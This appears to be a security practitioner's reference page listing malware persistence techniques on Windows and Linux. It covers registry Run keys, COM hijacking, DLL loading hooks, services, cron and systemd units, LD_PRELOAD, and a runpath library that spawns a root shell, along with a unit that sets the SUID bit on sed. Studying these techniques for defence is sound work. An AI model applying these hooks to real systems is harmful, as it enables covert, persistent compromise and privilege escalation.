|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     
         |/                

Last changed: 09.11.2018

Malware Persistence


Windows


Below I list a selection of the most presend persistend methods found in malware. A huge collection of persistence methods can be found on http://www.hexacorn.com/blog/2017/01/28/beyond-good-ol-run-key-all-parts/.

run keys (admin privileges)

Create a value my_program REG_SZ 'evil.exe' in

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

run keys (user privileges)

Create a value my_program REG_SZ 'evil.exe' in

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

or a value Run REG_SZ 'evil.exe' in

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows

startup folder

copy evil.exe "%allusersprofile%\microsoft\windows\start menu\programs\startup\"
copy evil.exe "%appdata%\microsoft\windows\start menu\programs\startup\"

$s=(New-Object -COM WScript.Shell);$lnk=$s.CreateShortcut([environment]::getfolderpath("startup")+"\start.lnk");$lnk.targetpath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe";$lnk.arguments="start-process -filepath c:\windows\system32\calc.exe";$lnk.save()

logon scripts

Create a value UserInitMprLogonScript in

HKEY_LOCAL_MACHINE\Environment

or

HKEY_CURRENT_USER\Environment

custom shell

Create a value Shell in

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

or

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

The malware should run explorer.exe.

authentication packages

Create a value Authentication Package REG_MULTI_SZ 'mydll.dll' or Security Packages REG_MULTI_SZ 'mydll.dll' in

HKLM\SYSTEM\CurrentControlSet\Control\Lsa

dll load order

If a program imports functions from a dll which is not in the program folder and not in

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\KnownDLLs

a malicious dll with the same name in the program folder will get loaded instead.

AppInit_DLLs

DLLs specified in the following keys will be loaded by user32.dll into every process that loads user32.dll

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows

Create a value AppInit_DLLs REG_EXPAND_SZ 'mydll.dll'

AppCertDlls

All applications calling CreateProcess will load dlls from the key

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls

Create a value my_dll REG_EXPAND_SZ 'mydll.dll'

AppPath

Affects all applications calling ShellExecute

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths

A subkey cmd.exe value (Standard) REG_SZ 'c:\evil.exe' will run evil.exe if cmd.exe shall be executed by the affected application.

print spooler

The spoolsv.exe loads libraries which are configured in

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors

Create your own subkey and there add a value Driver REG_SZ 'c:\mydll.dll' Alternatively create your own subkey under

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors

and there add a value Driver REG_SZ 'mydll.dll'. In this case your dll has to be in the folder C:\Windows\System32\spool\prtprocs\x64\.

services

To create a service from the command line see the pentesting commands for windows.

Installed services can be found in the key

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

The service can also be added to svchost by adding its name to the corresponding group in

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SVCHOST\

In this case the service needs a Parameters subkey containing the value ServiceDll and the associated dll needs to export ServiceMain.

As drivers are installed as a service with type= kernel rootkits could be found here as well.

scheduled tasks

The command to create a scheduled task from the command line can also be found in the pentesting commands for windows.

The task will be run by the Scheduler service.

COM hijacking

Create/replace the InprocServer32 key for COM Object with the malicious dll.

reg add HKCU\Software\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InprocServer32 /t REG_SZ /d c:\path\to\mydll.dll

Look at https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/ and https://attackiq.com/2020/03/26/component-object-model-hijacking/ for a nice summary.

WMI persistence

See https://github.com/n0pe-sled/WMI-Persistence/blob/master/WMI-Persistence.ps1 for powershell scripts which create and show WMI persistence.

Linux


rc files

/etc/profile
/etc/bash.bashrc

~/.profile
~/.bashrc

cron and anacron

Every user can create its own jobs with crontab. The jobs are stored in a file in the folder /var/spool/cron/crontabs/ with the name of the user.

echo '* * * * * /usr/bin/wall hello' | crontab -

As root user system wide jobs can be stored in /etc/crontab or in a crontab like file in /etc/cron.d. Alternatively an executables can be put into one of the folders /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly or /etc/cron.monthly.

If anacron is installed it will do the daily, weekly and monthly jobs instead of cron to ensure execution of jobs, which were missed due to system downtime. Jobs specifically for anacron can also be put in the file /etc/anacrontab.

systemd services

Services in systemd are configured in unit files. To show the path where systemd looks for unit files run

systemctl show --property=UnitPath | cat

To view the content of a unit file use the command

systemctl cat <name>.service

unit files can be created manually with a text editor or by running

systemctl edit --force --full example.service

example.service

[Unit]
Description=Set suid bit on sed
[Service]
ExecStart=chmod 4755 `which sed`
[Install]
WantedBy=multi-user.target

Services are started automatically if their corresponding target is run (like SysV runlevels). To show the current targets use

systemctl list-units --type=target
systemctl get-default

To link a service to a certain target put a symlink in the folder /etc/systemd/system/<my_target>.target.wants/ or enable the service with

systemctl enable example.service

systemd timers

Systemd offers its own method of scheduling jobs called timers. Exsisting timers can by shown by running

systemctl list-timers

Timers consist of a timer unit file and a matching service unit file. When a service is started by a timer it does not need the [Install] section.

example.timer

[Unit]
Description=Run example.service weekly
[Timer]
OnCalendar=weekly
Persistent=true
[Install]
WantedBy=timers.target

LD_PRELOAD

To load a library into every created process the environment variable LD_PRELOAD can be used.

#include <stdio.h>
void __attribute__ ((constructor)) init(void){
    printf("Press any key...");
    int c = getchar();
}

Compile and test this behavior with

gcc -fPIC -shared -o lib.so lib.c
LD_PRELOAD=$PWD/lib.so ls

To make this change permanent the export can be written into one of the rc files or the path to the library can be put into /etc/ld.so.preload.

runpath

If you can write to the runpath of a binary or a directory from /etc/ld.so.conf* you can put a library there. This should even work with SUID binaries.

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>

int printf(const char *format, ... ){
        uid_t uid, euid, new_uid;
        uid = getuid();
        euid = geteuid();
        setreuid(euid, euid);
        new_uid = getuid();
        if (new_uid != uid)
                system("/bin/sh");
        return 0;
}

networking hooks

Depending on the networking client different methods exist to automatically run a script when a connection is established.

/etc/network/if-up.d/
/etc/NetworkManager/dispather.d/

kernel drivers

If the malware is a kernel rootkit it can be configured as a module to be loaded at boot. Depending on your distribution this could be done in the following locations.

/etc/modules
/etc/modules.conf
/etc/sysconfig/modules/
/etc/modules-load.d/